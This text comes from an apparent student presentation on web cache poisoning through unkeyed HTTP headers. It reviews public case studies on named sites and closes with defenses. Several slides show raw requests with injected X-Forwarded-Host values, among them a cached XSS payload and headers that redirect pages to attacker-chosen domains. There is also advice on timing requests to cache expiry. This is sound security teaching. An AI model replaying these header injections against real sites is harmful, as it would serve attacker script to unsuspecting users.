2. About Me
● A neophyte
● Web enthusiast
● iAm NoT yEt wORkInG iAm
sTiLl sTudiNg (◕‿◕)
3. Overview
● What cache poisoning we are
talking about?
● Quickly Recalling Caching
● Case Studies
● Practical Time
● Defense
4. Web Cache Poisoning at a glance
Web Cache Poisoning is NOT
● Web Cache Deception
● Browser Cache Poisoning
● Request Smuggling
● Response Splitting
● DNS Cache Poisoning
11. How do we poison caches?
● Using unkeyed inputs like HTTP Headers
● Using Request Smuggling
● Using Response Splitting
➔ This presentation is focused on exploiting using HTTP Headers
18. Cached XSSed Response in
redhat.com
GET /en?dontpoisoneveryone=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: a."><script>alert(1)</script>
HTTP/1.1 200 OK
Cache-Control: public, no-cache
Blah…
<meta property="og:image"
content="https://a."><script>alert(1)</script>"/>
19. Discreet Poisoning
● We just poisoned the cache for
https://redhat.com/en?dontpoisoneveryone=1
● We need to be first to send the request whenever this
cache expires in order to poison site’s legitimate users.
● We need to reverse engineer cache expiry system and
crawl into documentation to figure out exact time the
cached object will be expired.
22. DOM Poisoning
Request:
GET /dataset HTTP/1.1
Host: catalog.data.gov
X-Forwarded-Host: canary
Response:
HTTP/1.1 200 OK
Age: 32707
X-Cache: Hit from cloudfront
…
<body data-site-root="https://canary/">
23. Request:
GET /dataset HTTP/1.1
Host: catalog.data.gov
X-Forwarded-Host: id.burpcollaborator.net
Response:
HTTP/1.1 200 OK
Age: 32707
X-Cache: Hit from cloudfront
…
<body data-site-
root="https://id.burpcollaborator.net/">
26. ● A cool feature to install addons in background for
marketing purposes
● This feature became famous by forcefully installing
Mr.Robot extension in background
● They were using Nginx for caching
● Mozilla sent a weird request which contained Origin
header in all lowercase
Mozilla SHIELD
GET /api/v1/recipe/signed/
HTTP/1.1
Blah: ...
origin: null
Blah: ...
28. ● Signing was there so we couldn’t install any addon of our
choice
● Backend mozilla systems that use unsigned recipes let us
peek into system and might help us obtain signing key
● But we could still perform a DDoS
● We could install already signed addons
29. Route Poisoning in goodhire.com
● Some applications dumbly use request headers to
generate URLs and use them for routing :)
● goodhire.com is hosted on hubspot.com which is using
cloudflare caching server.
30. Route Poisoning in goodhire.com
Request:
GET / HTTP/1.1
Host: www.goodhire.com
X-Forwarded-Server: canary
Response:
HTTP/1.1 404 Not Found
CF-Cache-Status: MISS
...
<title>HubSpot - Page not found</title>
<p>The domain canary does not exist in our system.</p>
31. Request:
GET / HTTP/1.1
Host: www.goodhire.com
X-Forwarded-Host: portswigger-labs-
4223616.hs-sites.com
Response:
HTTP/1.1 200 OK
...
<script>alert(document.domain)</script>
32. Hidden route poisoning
● This vulnerability was in blog.cloudflare.com which was
using its own caching service
● blog.cloudflare.com is hosted using Ghost.
33. A normal fail response
Request:
GET / HTTP/1.1
Host: blog.cloudflare.com
X-Forwarded-Host: canary
Response:
HTTP/1.1 302 Found
Location: https://ghost.org/fail/
35. B...bu….but what if we use a
website hosted on ghost?
Request:
GET / HTTP/1.1
Host: blog.cloudflare.com
X-Forwarded-Host: noshandnibble.ghost.io
Response:
HTTP/1.1 302 Found
Location: http://noshandnibble.blog/
36. How much damage can we do
with it?
● Files that were cached
a. jpg
b. png
c. pdf
d. js
e. css
37. Bypassing mixed-content
protection
● Mixed-content is when your website is HTTPS and is
requesting some resource via HTTP.
● Browsers block this type of imports and this feature is
called mixed-content protection.
● This redirect ghost did was an HTTP rather than HTTPS
which was a big obstacle.
Again stuck :/
38. Luckily, bounty hunters helped
● Safari’s HSTS redirect
automatically upgrades it to
HTTPS
● HSTS is a technique which is
used to prevent data from
being eavesdropped by
upgrading from HTTP to
HTTPS.
● Edge’s 302 response
completely bypasses mixed-
content protection
39. Chaining unkeyed inputs
● Sometimes, unkeyed inputs only confuse some part of
application.
● We will need to chain unkeyed inputs in order to get something
useful
40. Request:
GET /en HTTP/1.1
Host: redacted.net
X-Forwarded-Host: xyz
Response:
HTTP/1.1 200 OK
Set-Cookie: locale=en; domain=xyz
Request 1
41. Request:
GET /en HTTP/1.1
Host: redacted.net
X-Forwarded-Scheme: nothttps
Response:
HTTP/1.1 301 Moved
Permanently
Location: https://redacted.net/en
Request 2
43. Open Graph Hijacking
● Here’s everyone’s favourite, facebook hacking!
● Open Graph is a protocol developed by Facebook which
allows to integrate between facebook and other apps.
● But what if we cache some malicious page which will in
turn share what we want to share? Let’s try it out.
46. Defense
● Do NOT use caching at all!
● Avoid taking input from headers.
● If do, then include them in cache key.
● Use burp active scanner or Param Miner like tools to find
out unkeyed inputs.
47. Thanks
● Connect with me
○ kuldeep.pandya.77799@Facebook
○ some_dank_boi@Instagram
○ Predator77799@Twitter